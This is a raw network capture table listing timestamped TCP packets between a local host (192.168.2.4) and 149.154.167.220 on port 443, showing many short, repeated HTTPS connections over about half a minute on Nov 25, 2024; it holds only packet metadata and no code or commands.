Nov 25, 2024 11:44:36.764746904 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:36.764791965 CET	443	50010	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:36.764866114 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:36.765104055 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:36.765119076 CET	443	50010	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:38.127846956 CET	443	50010	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:38.127931118 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.129497051 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.129509926 CET	443	50010	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:38.129770994 CET	443	50010	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:38.133658886 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.133923054 CET	443	50010	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:38.134007931 CET	50010	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.136445999 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.136497021 CET	443	50013	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:38.136579037 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.136807919 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:38.136826992 CET	443	50013	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:39.503915071 CET	443	50013	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:39.503998041 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.511467934 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.511502028 CET	443	50013	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:39.511821985 CET	443	50013	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:39.520128012 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.520236969 CET	443	50013	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:39.520299911 CET	50013	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.653382063 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.653428078 CET	443	50018	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:39.653501987 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.654021025 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:39.654033899 CET	443	50018	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:41.017565012 CET	443	50018	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:41.017640114 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.019795895 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.019804955 CET	443	50018	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:41.020061016 CET	443	50018	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:41.023571014 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.023797989 CET	443	50018	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:41.023854971 CET	50018	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.027587891 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.027625084 CET	443	50022	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:41.027754068 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.027980089 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:41.027995110 CET	443	50022	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:42.492919922 CET	443	50022	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:42.493005037 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.494743109 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.494749069 CET	443	50022	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:42.494997025 CET	443	50022	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:42.560935974 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.561150074 CET	443	50022	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:42.561214924 CET	50022	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.571963072 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.572053909 CET	443	50026	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:42.572133064 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.572582960 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:42.572616100 CET	443	50026	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:44.038117886 CET	443	50026	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:44.038202047 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.040469885 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.040486097 CET	443	50026	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:44.040781021 CET	443	50026	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:44.043101072 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.043145895 CET	443	50026	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:44.043276072 CET	50026	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.046531916 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.046567917 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:44.046775103 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.046937943 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:44.046952963 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.456108093 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.456212044 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.458631992 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.458663940 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.458933115 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.461252928 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.461307049 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.461575031 CET	443	50031	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.461641073 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.461697102 CET	50031	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.466665983 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.466718912 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:45.466778994 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.467199087 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:45.467225075 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.875977039 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.876044035 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.877655029 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.877671957 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.877928972 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.880256891 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.880306005 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.880506039 CET	443	50034	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.880563021 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.880583048 CET	50034	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.883724928 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.883764982 CET	443	50039	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:46.883955956 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.884272099 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:46.884284973 CET	443	50039	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:48.320755959 CET	443	50039	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:48.320844889 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.322374105 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.322386026 CET	443	50039	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:48.322633982 CET	443	50039	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:48.324414968 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.324455976 CET	443	50039	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:48.324517965 CET	50039	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.327416897 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.327478886 CET	443	50044	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:48.328118086 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.328368902 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:48.328389883 CET	443	50044	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:49.783112049 CET	443	50044	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:49.783195972 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.786402941 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.786426067 CET	443	50044	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:49.786672115 CET	443	50044	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:49.790420055 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.790468931 CET	443	50044	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:49.790524960 CET	50044	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.796864033 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.796917915 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:49.797141075 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.797334909 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:49.797358990 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.161443949 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.161566973 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.163806915 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.163821936 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.164057016 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.167246103 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.167294979 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.167488098 CET	443	50046	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.167548895 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.167570114 CET	50046	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.171297073 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.171355009 CET	443	50051	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:51.171706915 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.172214985 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:51.172231913 CET	443	50051	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:52.630140066 CET	443	50051	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:52.630218983 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.631845951 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.631858110 CET	443	50051	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:52.632101059 CET	443	50051	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:52.633791924 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.633827925 CET	443	50051	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:52.633888960 CET	50051	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.636719942 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.636751890 CET	443	50057	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:52.639868021 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.640110970 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:52.640126944 CET	443	50057	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:54.001728058 CET	443	50057	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:54.001807928 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.003299952 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.003320932 CET	443	50057	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:54.003570080 CET	443	50057	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:54.005651951 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.005692959 CET	443	50057	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:54.005753994 CET	50057	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.008780956 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.008816957 CET	443	50059	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:54.008974075 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.009237051 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:54.009253025 CET	443	50059	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:55.370215893 CET	443	50059	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:55.370295048 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.372180939 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.372193098 CET	443	50059	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:55.372433901 CET	443	50059	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:55.374967098 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.375008106 CET	443	50059	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:55.375065088 CET	50059	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.379235029 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.379260063 CET	443	50064	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:55.379338026 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.379618883 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:55.379631996 CET	443	50064	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:56.786679029 CET	443	50064	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:56.786756992 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.788451910 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.788464069 CET	443	50064	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:56.788770914 CET	443	50064	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:56.790776014 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.790910006 CET	443	50064	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:56.791014910 CET	50064	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.793744087 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.793781042 CET	443	50069	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:56.793948889 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.794176102 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:56.794193983 CET	443	50069	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.204700947 CET	443	50069	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.204785109 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.206315994 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.206325054 CET	443	50069	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.206581116 CET	443	50069	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.208271027 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.208312035 CET	443	50069	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.208379984 CET	50069	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.210859060 CET	50071	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.210880041 CET	443	50071	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.210952997 CET	50071	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.238054037 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.238094091 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:58.238152027 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.238681078 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:58.238693953 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.661492109 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.661578894 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.664658070 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.664669991 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.665019989 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.668427944 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.668472052 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.668612957 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.668613911 CET	443	50072	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.668668985 CET	50072	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.668940067 CET	50071	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.673233986 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.673264980 CET	443	50078	149.154.167.220	192.168.2.4
Nov 25, 2024 11:44:59.673429012 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.673860073 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:44:59.673871994 CET	443	50078	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:01.080805063 CET	443	50078	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:01.080884933 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.084570885 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.084577084 CET	443	50078	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:01.084834099 CET	443	50078	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:01.087203979 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.087244987 CET	443	50078	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:01.087450027 CET	50078	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.089874029 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.089905024 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:01.089975119 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.090187073 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:01.090204000 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.500215054 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.504726887 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.516362906 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.516383886 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.516767979 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.571228981 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.571331024 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.571541071 CET	443	50081	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.571584940 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.574991941 CET	50081	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.610599041 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.610631943 CET	443	50084	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:02.611870050 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.614737988 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:02.614748955 CET	443	50084	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:04.039094925 CET	443	50084	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:04.039217949 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.041316032 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.041326046 CET	443	50084	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:04.041637897 CET	443	50084	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:04.043452978 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.043486118 CET	443	50084	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:04.043553114 CET	50084	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.046853065 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.046891928 CET	443	50085	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:04.046984911 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.047271013 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:04.047291040 CET	443	50085	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:05.408310890 CET	443	50085	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:05.408392906 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.411375046 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.411389112 CET	443	50085	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:05.411638021 CET	443	50085	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:05.414405107 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.414446115 CET	443	50085	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:05.414518118 CET	50085	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.419292927 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.419328928 CET	443	50086	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:05.419404030 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.419712067 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:05.419718981 CET	443	50086	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:06.794163942 CET	443	50086	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:06.794384003 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.795871973 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.795877934 CET	443	50086	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:06.796111107 CET	443	50086	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:06.797975063 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.798000097 CET	443	50086	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:06.798055887 CET	50086	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.800879955 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.800936937 CET	443	50087	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:06.801150084 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.801235914 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:06.801250935 CET	443	50087	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:08.164031982 CET	443	50087	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:08.164146900 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.165976048 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.165987968 CET	443	50087	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:08.166316986 CET	443	50087	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:08.168111086 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.168159962 CET	443	50087	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:08.168227911 CET	50087	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.170790911 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.170838118 CET	443	50088	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:08.170918941 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.171122074 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:08.171134949 CET	443	50088	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:09.586463928 CET	443	50088	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:09.586556911 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.588109970 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.588121891 CET	443	50088	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:09.588349104 CET	443	50088	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:09.590063095 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.590087891 CET	443	50088	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:09.590157986 CET	50088	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.592746973 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.592782974 CET	443	50089	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:09.592858076 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.593070984 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:09.593079090 CET	443	50089	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:11.010291100 CET	443	50089	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:11.010399103 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.012032986 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.012042046 CET	443	50089	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:11.012274027 CET	443	50089	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:11.014085054 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.014116049 CET	443	50089	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:11.014183044 CET	50089	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.016724110 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.016762018 CET	443	50090	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:11.016834021 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.017076969 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:11.017087936 CET	443	50090	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:12.385221958 CET	443	50090	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:12.385407925 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:12.387059927 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:12.387072086 CET	443	50090	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:12.387306929 CET	443	50090	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:12.389503956 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:12.389543056 CET	443	50090	149.154.167.220	192.168.2.4
Nov 25, 2024 11:45:12.389614105 CET	50090	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:45:12.392546892 CET	50091	443	192.168.2.4	149.154.167.220
